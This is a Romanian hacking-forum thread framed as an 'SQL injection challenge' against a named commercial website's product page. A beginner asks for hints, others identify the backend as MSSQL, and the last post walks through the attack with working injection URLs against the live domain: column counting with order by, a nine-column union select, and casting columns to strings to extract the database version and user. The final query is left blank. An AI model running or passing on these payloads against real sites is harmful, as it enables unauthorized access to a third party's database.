Sql injection Challenge

Target: xxx.bellmanandflint.co.uk/product_details.aspx?product_id=1900

Cerinte :

- Folositi doar Union Based NU ERROR BASED NU STACKED QUERY

- Scoateti versiunea impreuna cu nickul vostru ,baza de date principala si username-ul

De 2 zile m-am apucat si eu de tutoriale SQLi si pe acest site deci pur si simplu nu vrea sa mearga... hmm

Deci am aflat nr. de coloane: 9, dar cand dau sa le afisez nu-mi afiseaza nimic pe ecran, nici un numar/text si functia version() nu o recunoaste deci ma gandesc ca e mai invechit serverul mysql deci am incercat @@version si nu da eroare dar nu afiseaza.

Ceva hint-uri pentru un newbie?

Nu e MySQL tipul bazei de date ?i nu este un server.

MSSQL ,union basedu pe care il stie toata lumea cu un mic trick la partea de tip de date(INT/STRING) .

Eroarea spune totul

Unable to cast object of type 'System.Int32' to type 'System.String'.

Programatori stiu ce inseamna asta;)

Stiu, am incercat din prima cu .ToString() .tostring() si alte functii dar nu merg... probabil e prea veche versiunea si nu gasesc alte functii :? probabil trebuie criptat in hexa sau altceva? mai multe indicatii ? mersi in avans :)

L.E: Gata, m-am prins :D voi posta curand print

L.E2: Deocamdata doar versiunea :


Felicitari celor care au reusit sa il rezolve!

In primul rand este de tip String

Bellman & Flint - Product Details

Bellman & Flint - Product Details

Numaratul coloanelor se face exact ca la Mysql

http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 order by 1--

Si in total sunt 9 coloane apoi ca sa treceti de eroarea "Unable to cast object of type 'System.Int32' to type 'System.String'." care apare mai jos

http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select 1,2,3,4,5,6,7,8,9--

Trebuie sa transformam coloanele in string pentru ca sunt numere....

http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select '1','2','3','4','5','6','7','8','9'--

Pentru a extrage versiunea si Nick-ul vostru spre exemplu folosim + intre expresii


In final asta e sintaxa :


